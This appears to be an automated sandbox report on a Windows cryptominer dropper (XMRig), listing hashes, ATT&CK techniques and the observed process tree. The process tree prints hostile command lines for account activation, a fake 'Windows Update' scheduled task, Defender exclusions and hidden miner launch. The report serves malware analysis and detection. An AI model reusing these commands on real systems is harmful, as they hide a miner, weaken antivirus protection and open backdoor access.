Analysis

  • max time kernel
    136s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240319-en
  • resource tags

    arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
  • submitted
    29-03-2024 10:02

General

  • Target

    1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

  • Size

    5.2MB

  • MD5

    1f1f27deffe539d99e12d720f1fbd7da

  • SHA1

    a021497f416dded6636e88d8955a3a7632fbfcf2

  • SHA256

    7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863

  • SHA512

    2c4f8b7cf581a3ca57d7463e410a9f58bb484fef0708f15106db4c1601ebda739eef5bde96bad48e38367d53637a3deac94443d6fbf8b3d907b8838e054b1522

  • SSDEEP

    98304:5L6uEe3WyV1kpTAuLz2LgdOnV5N2Vv9Pe11dHO2:5oe3Wy/qEuLz20ne1DHO2

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\system32\whoami.exe
      whoami /priv
      2⤵
        PID:2976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" "net user Defaultaccount /active:yes"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" user Defaultaccount /active:yes
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2524
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user Defaultaccount /active:yes
            4⤵
              PID:2560
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2548
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "$getdate = (get-date).AddMinutes(1).ToString('HH:mm:ss');$trigger = New-ScheduledTaskTrigger -Daily -DaysInterval 1 -RandomDelay '00:00' -At $getdate; $Trigger.Repetition = $(New-ScheduledTaskTrigger -Once -RandomDelay '00:0' -At $getdate -RepetitionDuration (New-TimeSpan -Days 9000) -RepetitionInterval '00:10').Repetition;$User= 'NT AUTHORITY\SYSTEM';$Action= New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument 'C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs';Register-ScheduledTask -TaskName 'wuaserv' -Description 'Windows Update Service' -Trigger $Trigger -User $User -Action $Action -RunLevel Highest -Force -ErrorAction SilentlyContinue"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2580
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "Add-MpPreference -ExclusionPath C:\Users\Administrator\Appdata\Local\Temp\Windows"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2588
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "Set-MpPreference -ExclusionProcess zxmcjdm.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2460
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2024
        • C:\Windows\system32\cmd.exe
          "cmd" "/c taskkill /im zzmsahbg.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:476
          • C:\Windows\system32\taskkill.exe
            taskkill /im zzmsahbg.exe /f"
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:796
        • C:\Windows\system32\cmd.exe
          "cmd" "/c taskkill /im xmr-stak.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1108
          • C:\Windows\system32\taskkill.exe
            taskkill /im xmr-stak.exe /f"
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:304
        • C:\Windows\system32\cmd.exe
          "cmd" "/c taskkill /im asmhfn.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1092
          • C:\Windows\system32\taskkill.exe
            taskkill /im asmhfn.exe /f"
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:332
        • C:\Windows\system32\cmd.exe
          "cmd" "/c taskkill /im pamguam.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1304
          • C:\Windows\system32\taskkill.exe
            taskkill /im pamguam.exe /f"
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:320
        • C:\Windows\system32\cmd.exe
          "cmd" "/c taskkill /im xmrig.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Windows\system32\taskkill.exe
            taskkill /im xmrig.exe /f"
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "start-process C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe -WindowStyle hidden"
          2⤵
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2040
          • C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
            "C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1544
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2292
        • C:\Windows\system32\cmd.exe
          "cmd" "/c taskkill /im zzmsahbg.exe /f"
          2⤵
            PID:2528
            • C:\Windows\system32\taskkill.exe
              taskkill /im zzmsahbg.exe /f"
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2336
          • C:\Windows\system32\cmd.exe
            "cmd" "/c taskkill /im xmr-stak.exe /f"
            2⤵
              PID:1924
              • C:\Windows\system32\taskkill.exe
                taskkill /im xmr-stak.exe /f"
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2936
            • C:\Windows\system32\cmd.exe
              "cmd" "/c taskkill /im asmhfn.exe /f"
              2⤵
                PID:2396
                • C:\Windows\system32\taskkill.exe
                  taskkill /im asmhfn.exe /f"
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2444
              • C:\Windows\system32\cmd.exe
                "cmd" "/c taskkill /im pamguam.exe /f"
                2⤵
                  PID:1208
                  • C:\Windows\system32\taskkill.exe
                    taskkill /im pamguam.exe /f"
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2744
                • C:\Windows\system32\cmd.exe
                  "cmd" "/c taskkill /im xmrig.exe /f"
                  2⤵
                    PID:2504
                    • C:\Windows\system32\taskkill.exe
                      taskkill /im xmrig.exe /f"
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2588
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2768
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" "start-process C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe -WindowStyle hidden"
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2000
                    • C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
                      "C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2108

                Network

                MITRE ATT&CK Matrix ATT&CK v13

                Persistence

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Privilege Escalation

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Defense Evasion

                Modify Registry

                2
                T1112

                Subvert Trust Controls

                1
                T1553

                Install Root Certificate

                1
                T1553.004

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                  Filesize

                  68KB

                  MD5

                  29f65ba8e88c063813cc50a4ea544e93

                  SHA1

                  05a7040d5c127e68c25d81cc51271ffb8bef3568

                  SHA256

                  1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

                  SHA512

                  e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

                • C:\Users\Admin\AppData\Local\Temp\Tar1EBE.tmp
                  Filesize

                  177KB

                  MD5

                  435a9ac180383f9fa094131b173a2f7b

                  SHA1

                  76944ea657a9db94f9a4bef38f88c46ed4166983

                  SHA256

                  67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

                  SHA512

                  1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

                • C:\Users\Administrator\Appdata\Local\Temp\Windows\Windows_Defender.exe
                  Filesize

                  5.2MB

                  MD5

                  1f1f27deffe539d99e12d720f1fbd7da

                  SHA1

                  a021497f416dded6636e88d8955a3a7632fbfcf2

                  SHA256

                  7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863

                  SHA512

                  2c4f8b7cf581a3ca57d7463e410a9f58bb484fef0708f15106db4c1601ebda739eef5bde96bad48e38367d53637a3deac94443d6fbf8b3d907b8838e054b1522

                • \??\PIPE\srvsvc
                  MD5

                  d41d8cd98f00b204e9800998ecf8427e

                  SHA1

                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                  SHA256

                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                  SHA512

                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                • \Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
                  Filesize

                  3.1MB

                  MD5

                  94484839cf6f9765088e03271330ef26

                  SHA1

                  a9417b34c5d13354bd61b950142f47d7b92db6c1

                  SHA256

                  a7b71f6801c97c20677b4f5f54f77e69eb05108dc38ab67ac81a19338dfb3a65

                  SHA512

                  c434246af68785db332019ef0aac9e90678d9ca94c1ca9bf2a65a08803854843eae5e1da1b53565af831f3f20f54d24b0c7592c34535ad0888ee2c2e44149ac0

                • memory/808-53-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/808-54-0x0000000001E60000-0x0000000001EE0000-memory.dmp
                  Filesize

                  512KB

                • memory/808-55-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/808-56-0x0000000001E60000-0x0000000001EE0000-memory.dmp
                  Filesize

                  512KB

                • memory/808-57-0x0000000001E60000-0x0000000001EE0000-memory.dmp
                  Filesize

                  512KB

                • memory/808-58-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/1544-117-0x0000000000230000-0x0000000000234000-memory.dmp
                  Filesize

                  16KB

                • memory/1544-105-0x0000000000270000-0x0000000000274000-memory.dmp
                  Filesize

                  16KB

                • memory/1544-104-0x0000000000250000-0x0000000000254000-memory.dmp
                  Filesize

                  16KB

                • memory/1544-103-0x0000000000220000-0x0000000000224000-memory.dmp
                  Filesize

                  16KB

                • memory/1544-89-0x0000000000230000-0x0000000000234000-memory.dmp
                  Filesize

                  16KB

                • memory/1544-102-0x0000000000280000-0x0000000000284000-memory.dmp
                  Filesize

                  16KB

                • memory/1544-101-0x0000000000260000-0x0000000000264000-memory.dmp
                  Filesize

                  16KB

                • memory/1544-99-0x0000000000240000-0x0000000000244000-memory.dmp
                  Filesize

                  16KB

                • memory/1544-100-0x00000000002A0000-0x00000000002A4000-memory.dmp
                  Filesize

                  16KB

                • memory/1544-78-0x0000000000210000-0x0000000000220000-memory.dmp
                  Filesize

                  64KB

                • memory/1700-10-0x00000000025A0000-0x0000000002620000-memory.dmp
                  Filesize

                  512KB

                • memory/1700-5-0x00000000022E0000-0x00000000022E8000-memory.dmp
                  Filesize

                  32KB

                • memory/1700-4-0x000000001B1A0000-0x000000001B482000-memory.dmp
                  Filesize

                  2.9MB

                • memory/1700-6-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/1700-11-0x00000000025A0000-0x0000000002620000-memory.dmp
                  Filesize

                  512KB

                • memory/1700-7-0x00000000025A0000-0x0000000002620000-memory.dmp
                  Filesize

                  512KB

                • memory/1700-12-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/1700-9-0x00000000025A0000-0x0000000002620000-memory.dmp
                  Filesize

                  512KB

                • memory/1700-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2024-48-0x0000000002880000-0x0000000002900000-memory.dmp
                  Filesize

                  512KB

                • memory/2024-51-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2024-50-0x0000000002880000-0x0000000002900000-memory.dmp
                  Filesize

                  512KB

                • memory/2024-49-0x0000000002880000-0x0000000002900000-memory.dmp
                  Filesize

                  512KB

                • memory/2024-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2024-46-0x0000000002880000-0x0000000002900000-memory.dmp
                  Filesize

                  512KB

                • memory/2024-47-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2040-64-0x00000000027E0000-0x0000000002860000-memory.dmp
                  Filesize

                  512KB

                • memory/2040-59-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2040-68-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2040-67-0x00000000027E0000-0x0000000002860000-memory.dmp
                  Filesize

                  512KB

                • memory/2040-66-0x00000000027E0000-0x0000000002860000-memory.dmp
                  Filesize

                  512KB

                • memory/2040-61-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2040-60-0x00000000027E0000-0x0000000002860000-memory.dmp
                  Filesize

                  512KB

                • memory/2292-120-0x0000000002770000-0x00000000027F0000-memory.dmp
                  Filesize

                  512KB

                • memory/2292-119-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2460-38-0x000000000272B000-0x0000000002792000-memory.dmp
                  Filesize

                  412KB

                • memory/2460-35-0x0000000002720000-0x00000000027A0000-memory.dmp
                  Filesize

                  512KB

                • memory/2460-42-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2460-29-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2460-30-0x0000000002720000-0x00000000027A0000-memory.dmp
                  Filesize

                  512KB

                • memory/2460-32-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2548-23-0x0000000002560000-0x00000000025E0000-memory.dmp
                  Filesize

                  512KB

                • memory/2548-20-0x00000000003F0000-0x00000000003F8000-memory.dmp
                  Filesize

                  32KB

                • memory/2548-18-0x000000001B0E0000-0x000000001B3C2000-memory.dmp
                  Filesize

                  2.9MB

                • memory/2548-19-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2548-21-0x0000000002560000-0x00000000025E0000-memory.dmp
                  Filesize

                  512KB

                • memory/2548-22-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2548-24-0x0000000002560000-0x00000000025E0000-memory.dmp
                  Filesize

                  512KB

                • memory/2548-26-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2548-25-0x0000000002560000-0x00000000025E0000-memory.dmp
                  Filesize

                  512KB

                • memory/2580-37-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2580-43-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2580-40-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2580-41-0x0000000002590000-0x0000000002610000-memory.dmp
                  Filesize

                  512KB

                • memory/2580-39-0x0000000002590000-0x0000000002610000-memory.dmp
                  Filesize

                  512KB

                • memory/2588-36-0x00000000025BB000-0x0000000002622000-memory.dmp
                  Filesize

                  412KB

                • memory/2588-34-0x00000000025B0000-0x0000000002630000-memory.dmp
                  Filesize

                  512KB

                • memory/2588-33-0x00000000025B0000-0x0000000002630000-memory.dmp
                  Filesize

                  512KB

                • memory/2588-31-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
                  Filesize

                  9.6MB